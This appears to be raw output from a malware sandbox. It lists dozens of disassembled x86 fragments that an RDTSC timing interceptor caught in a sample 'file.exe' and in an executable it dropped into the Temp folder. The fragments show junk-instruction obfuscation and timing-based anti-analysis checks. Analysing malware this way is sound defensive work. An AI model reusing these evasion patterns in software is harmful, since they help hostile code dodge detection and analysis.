Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E07CE second address: 50E07D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E07D2 second address: 50E07D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E07D6 second address: 50E07DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E07DC second address: 50E07E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E07E2 second address: 50E07E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E07E6 second address: 50E087A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov cl, 9Bh 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F856102FBF9h 0x00000019 and si, BF16h 0x0000001e jmp 00007F856102FBF1h 0x00000023 popfd 0x00000024 call 00007F856102FBF0h 0x00000029 mov ebx, eax 0x0000002b pop esi 0x0000002c popad 0x0000002d push esp 0x0000002e pushad 0x0000002f mov bx, si 0x00000032 call 00007F856102FBF4h 0x00000037 push esi 0x00000038 pop ebx 0x00000039 pop eax 0x0000003a popad 0x0000003b mov dword ptr [esp], esi 0x0000003e jmp 00007F856102FBEDh 0x00000043 mov esi, dword ptr [ebp+0Ch] 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E087A second address: 50E0880 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0880 second address: 50E0885 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0885 second address: 50E08B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F856106A85Eh 0x0000000a and ax, 2728h 0x0000000f jmp 00007F856106A85Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 test esi, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E08B4 second address: 50E08B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E08B8 second address: 50E08BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E08BE second address: 50E094D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 13h 0x00000005 pushfd 0x00000006 jmp 00007F856102FBF5h 0x0000000b sbb ch, FFFFFFF6h 0x0000000e jmp 00007F856102FBF1h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 je 00007F85D1B5D6ACh 0x0000001d jmp 00007F856102FBEEh 0x00000022 cmp dword ptr [75C7459Ch], 05h 0x00000029 jmp 00007F856102FBF0h 0x0000002e je 00007F85D1B75761h 0x00000034 pushad 0x00000035 pushad 0x00000036 call 00007F856102FBECh 0x0000003b pop eax 0x0000003c push ebx 0x0000003d pop ecx 0x0000003e popad 0x0000003f mov al, bl 0x00000041 popad 0x00000042 xchg eax, esi 0x00000043 pushad 0x00000044 mov cx, 70CBh 0x00000048 push eax 0x00000049 mov di, 67F2h 0x0000004d pop edi 0x0000004e popad 0x0000004f push eax 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 mov ebx, 6E6DF3D8h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E094D second address: 50E095B instructions: 0x00000000 rdtsc 0x00000002 mov edi, 3EBA7584h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b movsx edi, si 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E09ED second address: 50E0A35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dh 0x00000005 mov dl, ch 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F856102FBEBh 0x00000014 sub cl, FFFFFFCEh 0x00000017 jmp 00007F856102FBF9h 0x0000001c popfd 0x0000001d jmp 00007F856102FBF0h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0A6F second address: 50E0A75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0A75 second address: 50E0AA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F856102FBF7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0AA1 second address: 50E0AA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, dh 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0AA8 second address: 50E0AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F856102FBF3h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0AC5 second address: 50E0ACB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0ACB second address: 50E0ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 19E4EB second address: 19E4F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 316149 second address: 31617D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F856102FBFCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F856102FC08h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F856102FBEAh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 31617D second address: 316181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 316181 second address: 316185 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 316185 second address: 31618B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3229B0 second address: 3229B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3229B9 second address: 3229C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 322C80 second address: 322C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F856102FBEFh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 322C94 second address: 322C99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 322C99 second address: 322CC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007F856102FBE6h 0x00000010 pop eax 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F856102FBF9h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 322CC7 second address: 322CCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 322F8F second address: 322F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 323136 second address: 323156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F856106A85Eh 0x0000000b pushad 0x0000000c ja 00007F856106A856h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3232D3 second address: 3232DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F856102FBE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3232DF second address: 3232F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007F856106A856h 0x0000000c jmp 00007F856106A85Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3232F7 second address: 323319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F856102FBFAh 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3263CF second address: 3263D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3263D8 second address: 3263DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3264CC second address: 32652E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D2441h], ebx 0x00000011 push 00000000h 0x00000013 mov esi, dword ptr [ebp+122D2E70h] 0x00000019 call 00007F856106A859h 0x0000001e pushad 0x0000001f jmp 00007F856106A85Eh 0x00000024 jmp 00007F856106A85Eh 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007F856106A865h 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 pushad 0x00000035 push ecx 0x00000036 pushad 0x00000037 popad 0x00000038 pop ecx 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 32652E second address: 326542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F856102FBE8h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 326542 second address: 326566 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A863h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push edi 0x0000000e jng 00007F856106A85Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 326566 second address: 3265D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 mov ecx, dword ptr [ebp+122D2D40h] 0x0000000c mov esi, eax 0x0000000e push 00000003h 0x00000010 jmp 00007F856102FBF0h 0x00000015 push 00000000h 0x00000017 call 00007F856102FBF6h 0x0000001c sub ch, 00000002h 0x0000001f pop esi 0x00000020 push 00000003h 0x00000022 jnc 00007F856102FBECh 0x00000028 and esi, dword ptr [ebp+122D2EB8h] 0x0000002e call 00007F856102FBE9h 0x00000033 pushad 0x00000034 jmp 00007F856102FBF6h 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3265D4 second address: 3265F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A860h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F856106A858h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3265F4 second address: 326623 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jno 00007F856102FBEEh 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007F856102FBEBh 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e push ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 326623 second address: 326661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jbe 00007F856106A869h 0x0000000b popad 0x0000000c pop eax 0x0000000d mov cx, 6D06h 0x00000011 lea ebx, dword ptr [ebp+1245C2E3h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F856106A861h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 326661 second address: 326667 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 326667 second address: 32666B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3266CF second address: 3266F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F856102FBF3h 0x0000000f jl 00007F856102FBECh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3266F4 second address: 326737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push edx 0x00000007 mov dword ptr [ebp+122D2568h], ecx 0x0000000d pop esi 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F856106A858h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov si, A035h 0x0000002e push 6EEC4E5Ah 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3267F2 second address: 3267FC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F856102FBE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3267FC second address: 326816 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F856106A865h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 326816 second address: 326887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F856102FBF9h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007F856102FBEBh 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push ebx 0x0000001d push edx 0x0000001e pop edx 0x0000001f pop ebx 0x00000020 popad 0x00000021 pop eax 0x00000022 call 00007F856102FBEEh 0x00000027 or si, 339Eh 0x0000002c pop esi 0x0000002d mov edx, dword ptr [ebp+122D2E24h] 0x00000033 lea ebx, dword ptr [ebp+1245C2ECh] 0x00000039 mov dword ptr [ebp+122D1CF3h], edx 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push ecx 0x00000043 jmp 00007F856102FBEAh 0x00000048 pop ecx 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 326887 second address: 32688D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 32694D second address: 326953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3453F9 second address: 3453FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3456F2 second address: 3456F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3456F6 second address: 345708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F856106A85Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 345B6A second address: 345B6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 345B6F second address: 345B87 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F856106A85Ch 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 345B87 second address: 345B8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 345CD1 second address: 345CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 345CD5 second address: 345CD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 345CD9 second address: 345CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F856106A864h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 345CF3 second address: 345D11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF9h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 345E97 second address: 345E9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 317BB5 second address: 317BB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 317BB9 second address: 317BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 346BEB second address: 346BF4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 346BF4 second address: 346BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 346D59 second address: 346D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 346D5D second address: 346D69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 3471D0 second address: 3471D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 34E813 second address: 34E817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 34EDF5 second address: 34EE0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 34EE0E second address: 34EE14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe RDTSC instruction interceptor: First address: 34EE14 second address: 34EE18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
